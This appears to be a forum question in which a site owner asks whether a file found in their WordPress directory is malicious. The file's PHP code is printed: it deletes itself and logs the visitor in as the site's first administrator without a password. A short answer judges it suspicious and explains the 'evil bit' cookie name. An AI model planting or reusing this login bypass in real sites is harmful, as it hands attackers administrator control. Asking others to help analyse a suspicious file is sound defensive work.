Found a file in my public_html directory that is suspicious

Question

I have found the file autologin-onnemkif.php

and the code is:

<?php
$f=__FILE__; $stat=stat($f); unlink($f);
setcookie("RFC3514","1",time()+604800,'/');
if(abs(time()-$stat[9])<120){
  require(dirname($f).'/wp-load.php');
  if (!$u=$wpdb->get_row("SELECT users.* FROM $wpdb->users users, $wpdb->usermeta users_meta where users.id=users_meta.user_id and users_meta.meta_key like '%capabilities' and users_meta.meta_value like '%administrator%' ORDER BY ID limit 1")) {
    $u=$wpdb->get_row("SELECT * FROM $wpdb->users ORDER BY ID limit 1");
  }
  $user=$u->user_login;
  wp_setcookie($user,rand(),false,"","","");
  do_action('wp_login',$user);
  wp_redirect('wp-admin/'); }

Is this code malicious?

Answer 1

Seems to be, autologin-onnemkif.php isn't standard.

Also setcookie("RFC3514","1",time()+604800,'/');

RCF3514 was an april fools joke, called the Evil Bit.

https://en.wikipedia.org/wiki/Evil_bit

https://www.ietf.org/rfc/rfc3514.txt